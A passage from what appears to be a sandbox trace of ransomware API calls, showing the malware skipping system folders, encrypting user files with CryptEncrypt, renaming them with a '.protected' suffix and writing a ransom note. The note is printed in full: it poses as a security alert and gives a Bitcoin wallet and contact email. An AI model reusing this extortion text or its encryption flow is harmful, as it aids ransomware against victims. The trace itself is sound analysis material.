(normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.929] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0094.929] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.929] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.929] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.929] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.929] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.929] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\..") returned 92 [0094.929] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.929] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.929] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.929] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.929] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0094.929] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0094.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.." 
(normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.930] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0094.930] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="Windows") returned -1 [0094.930] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="Program Files") returned -1 [0094.930] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="Program Files (x86)") returned -1 [0094.930] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="$Recycle.bin") returned 1 [0094.930] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="System Volume Information") returned -1 [0094.930] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 110 [0094.930] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2=".") returned 1 [0094.930] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2="..") returned 1 [0094.930] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned 112 [0094.930] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0094.930] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.930] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.930] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.930] lstrcmpiW 
(lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.930] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.930] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\.") returned 112 [0094.931] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.931] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.931] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.931] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.931] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.931] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.931] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.931] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\..") returned 113 [0094.931] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.931] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.931] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0094.931] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0094.931] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\RESTORE_FILES.txt") returned 128 [0094.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\RESTORE_FILES.txt" (normalized: 
"c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0094.932] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.932] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0094.933] 
lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.933] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.933] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.933] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0094.933] CloseHandle (hObject=0x154) returned 1 [0094.933] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0094.933] lstrcmpiW (lpString1="TaskBar", lpString2="Windows") returned -1 [0094.933] lstrcmpiW (lpString1="TaskBar", lpString2="Program Files") returned 1 [0094.933] lstrcmpiW (lpString1="TaskBar", lpString2="Program Files (x86)") returned 1 [0094.933] lstrcmpiW (lpString1="TaskBar", lpString2="$Recycle.bin") returned 1 [0094.933] lstrcmpiW (lpString1="TaskBar", lpString2="System Volume Information") 
returned 1 [0094.933] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 97 [0094.933] lstrcmpW (lpString1="TaskBar", lpString2=".") returned 1 [0094.933] lstrcmpW (lpString1="TaskBar", lpString2="..") returned 1 [0094.933] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned 99 [0094.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0094.982] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.982] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.982] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.982] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.982] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.982] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.") returned 99 [0094.982] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.982] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.982] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.982] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.982] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.982] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.982] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.982] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.982] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.982] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.982] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.982] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.982] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\..") returned 100 [0094.983] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.983] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.983] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.983] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.983] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.983] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.." 
(normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.983] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.983] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0094.983] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0094.983] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0094.983] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0094.983] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0094.983] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 109 [0094.983] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0094.983] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0094.983] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.983] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 
[0094.984] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 109 [0094.984] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0094.984] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 109 [0094.984] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0094.984] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 109 [0094.984] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0094.984] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0xd3, lpOverlapped=0x0) returned 1 [0094.985] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.985] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0xd3, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0xd3, lpOverlapped=0x0) returned 1 [0094.985] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.985] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.985] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.986] CloseHandle 
(hObject=0x158) returned 1 [0094.986] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.protected") returned 119 [0094.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.protected")) returned 1 [0094.987] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.987] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Windows") returned -1 [0094.987] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Program Files") returned -1 [0094.987] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Program Files (x86)") returned -1 [0094.987] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="$Recycle.bin") returned 1 [0094.987] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="System Volume Information") returned -1 [0094.987] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 119 [0094.987] StrStrIW (lpFirst="Internet Explorer.lnk", lpSrch=".protected") returned 0x0 [0094.987] lstrcmpW (lpString1="Internet Explorer.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0094.987] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: 
pbBuffer=0x295e28c) returned 1 [0094.987] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.987] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 119 [0094.987] StrStrW (lpFirst="Internet Explorer.lnk", lpSrch=".txt") returned 0x0 [0094.987] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 119 [0094.987] StrStrW (lpFirst="Internet Explorer.lnk", lpSrch=".rar") returned 0x0 [0094.988] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 119 [0094.988] StrStrW (lpFirst="Internet Explorer.lnk", lpSrch=".zip") returned 0x0 [0094.988] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x5a9, lpOverlapped=0x0) returned 1 [0094.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.989] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x5a9, 
lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x5a9, lpOverlapped=0x0) returned 1 [0094.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.990] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.990] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.990] CloseHandle (hObject=0x158) returned 1 [0094.990] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.protected") returned 129 [0094.990] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.protected")) returned 1 [0094.991] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.991] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Windows") returned 1 [0094.991] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Program Files") 
returned 1 [0094.991] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Program Files (x86)") returned 1 [0094.991] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="$Recycle.bin") returned 1 [0094.991] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="System Volume Information") returned 1 [0094.991] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 118 [0094.991] StrStrIW (lpFirst="Windows Explorer.lnk", lpSrch=".protected") returned 0x0 [0094.991] lstrcmpW (lpString1="Windows Explorer.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0094.991] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.991] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.991] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 118 [0094.991] StrStrW (lpFirst="Windows Explorer.lnk", lpSrch=".txt") returned 0x0 [0094.991] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 118 [0094.991] StrStrW (lpFirst="Windows 
